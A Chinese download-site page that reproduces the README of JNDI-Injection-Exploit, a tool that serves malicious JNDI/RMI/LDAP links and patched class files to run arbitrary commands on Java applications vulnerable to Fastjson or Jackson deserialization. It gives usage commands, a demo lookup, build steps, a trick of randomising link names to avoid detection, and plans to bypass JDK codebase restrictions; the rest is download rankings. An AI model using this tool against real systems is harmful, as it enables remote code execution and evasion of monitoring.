资料介绍
软件简介
JNDI-Injection-Exploit —— JNDI 注入利用工具,生成 JNDI 链接并启动后端相关服务,可用于 Fastjson、Jackson 等相关漏洞的验证。
使用
可执行程序为 jar 包,在命令行中运行以下命令:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
其中:
-
-C - 远程 class 文件中要执行的命令。
(可选项 , 默认命令是 mac 下打开计算器,即"open /Applications/Calculator.app")
-
-A - 服务器地址,可以是 IP 地址或者域名。
(可选项 , 默认地址是第一个网卡地址)
注意:
-
要确保 1099、1389、8180 端口可用,不被其他程序占用。
或者你也可以在 run.ServerStart 类 26~28 行更改默认端口。
-
命令会被作为参数传入 Runtime.getRuntime().exec(),
所以需要确保命令传入 exec() 方法可执行。
bash等可在shell直接执行的相关命令需要加双引号,比如说 java -jar JNDI.jar -C "bash -c ..."
示例
本地演示:
-
启动 JNDI-Injection-Exploit:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
我们需要把第一步中生成的 JNDI 链接注入到存在漏洞的应用环境中,方便解释用如下代码模仿漏洞环境:
public static void main(String[] args) throws Exception{
InitialContext ctx = new InitialContext();
ctx.lookup("rmi://127.0.0.1/fgf4fp");
}
当上面代码运行后,应用便会执行相应命令,这里是弹出计算器,没截图,可以自己测一下。
截图是工具的server端日志:
安装
下面两种方法都可以得到Jar包
-
把源码下载到本地然后自行编译打包。(在Java1.7+ 、Java1.8+ 和 Maven 3.x+环境下测试可以)
$ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
$ cd JNDI-Injection-Exploit
$ mvn clean package -DskipTests
工具实现
- 首先生成的链接后面codebaseClass是6位随机的,这个是因为不希望让工具生成的链接本身成为一种特征被监控或拦截。
- 服务器地址实际就是codebase地址,相比于marshalsec中的JNDI server来说,这个工具把JNDI server和HTTP server绑定到一起,并自动启动HTTP server返回相应class,更自动化了。
- HTTP server基于jetty实现的,本质上是一个能下载文件的servlet,比较有意思的是我提前编译好class模板放到resource目录,然后servlet会读取class文件,使用ASM框架对读取的字节码进行修改,然后插入我们想要执行的命令,返回修改后的字节码。
待实现
- (已完成EL表达式绕过部分)在更高版本的 JDK 环境中 trustURLCodebase 变量为 false,限制了远程类的加载,我会找时间把JNDI-Injection-Bypass这个项目的东西融入到本项目中,生成能绕过 JDK 限制 JNDI 链接。
- 常用串口通信测试工具sscom 2次下载
- 基于OTA升级的ESP01S固件测试工具 19次下载
- 可提升样本程序软件质量的自动化测试工具 19次下载
- modbus调试工具
- 蓝牙调试工具BTool v1.40.5资源下载 27次下载
- 纳米器件的测试工具资料下载
- USB-TTL测试工具应用程序免费下载 143次下载
- TC35短信收发测试工具下载 7次下载
- cpu性能测试工具(ORTHOS)中文版免费下载 0次下载
- 渗透测试工具开发 18次下载
- TCP/UDPDbg测试工具 319次下载
- 软件测试工具的分类和使用 68次下载
- ICOM多串口卡测试工具
- TD-SCDMA测试工具体系及应用
- TD-SCDMA网络测试工具及手段
- Linux下的stress-ng压力测试工具介绍 8001次阅读
- 多核应用调试工具CodeViser介绍 1129次阅读
- T900串口测试工具的使用教程 2579次阅读
- 命令执行不回显利用工具解读 1310次阅读
- 测试工具的主要目的 1155次阅读
- 如何使用DudeSuite进行渗透测试工作 1686次阅读
- 基于安卓的渗透测试工具集 1274次阅读
- 详解半导体封装测试工艺 1650次阅读
- 基于QT的串口调试工具设计 2328次阅读
- 渗透测试工具箱siusiu的特性及使用 2777次阅读
- 一种开源渗透测试工具toxssin介绍 1451次阅读
- 介绍一款功能强大的自动化Deauth渗透测试工具 1280次阅读
- 常用蓝牙调试工具分享 6771次阅读
- 123个Python渗透测试工具你了解多少黑客资源 5792次阅读
- 常用的软件测试工具有哪些_10款常用的软件测试工具推荐 7.5w次阅读
下载排行
本周
- 1山景DSP芯片AP8248A2数据手册
- 1.06 MB | 532次下载 | 免费
- 2RK3399完整板原理图(支持平板,盒子VR)
- 3.28 MB | 339次下载 | 免费
- 3TC358743XBG评估板参考手册
- 1.36 MB | 330次下载 | 免费
- 4DFM软件使用教程
- 0.84 MB | 295次下载 | 免费
- 5元宇宙深度解析—未来的未来-风口还是泡沫
- 6.40 MB | 227次下载 | 免费
- 6迪文DGUS开发指南
- 31.67 MB | 194次下载 | 免费
- 7元宇宙底层硬件系列报告
- 13.42 MB | 182次下载 | 免费
- 8FP5207XR-G1中文应用手册
- 1.09 MB | 178次下载 | 免费
本月
- 1OrCAD10.5下载OrCAD10.5中文版软件
- 0.00 MB | 234315次下载 | 免费
- 2555集成电路应用800例(新编版)
- 0.00 MB | 33566次下载 | 免费
- 3接口电路图大全
- 未知 | 30323次下载 | 免费
- 4开关电源设计实例指南
- 未知 | 21549次下载 | 免费
- 5电气工程师手册免费下载(新编第二版pdf电子书)
- 0.00 MB | 15349次下载 | 免费
- 6数字电路基础pdf(下载)
- 未知 | 13750次下载 | 免费
- 7电子制作实例集锦 下载
- 未知 | 8113次下载 | 免费
- 8《LED驱动电路设计》 温德尔著
- 0.00 MB | 6656次下载 | 免费
总榜
- 1matlab软件下载入口
- 未知 | 935054次下载 | 免费
- 2protel99se软件下载(可英文版转中文版)
- 78.1 MB | 537798次下载 | 免费
- 3MATLAB 7.1 下载 (含软件介绍)
- 未知 | 420027次下载 | 免费
- 4OrCAD10.5下载OrCAD10.5中文版软件
- 0.00 MB | 234315次下载 | 免费
- 5Altium DXP2002下载入口
- 未知 | 233046次下载 | 免费
- 6电路仿真软件multisim 10.0免费下载
- 340992 | 191187次下载 | 免费
- 7十天学会AVR单片机与C语言视频教程 下载
- 158M | 183279次下载 | 免费
- 8proe5.0野火版下载(中文版免费下载)
- 未知 | 138040次下载 | 免费
评论
查看更多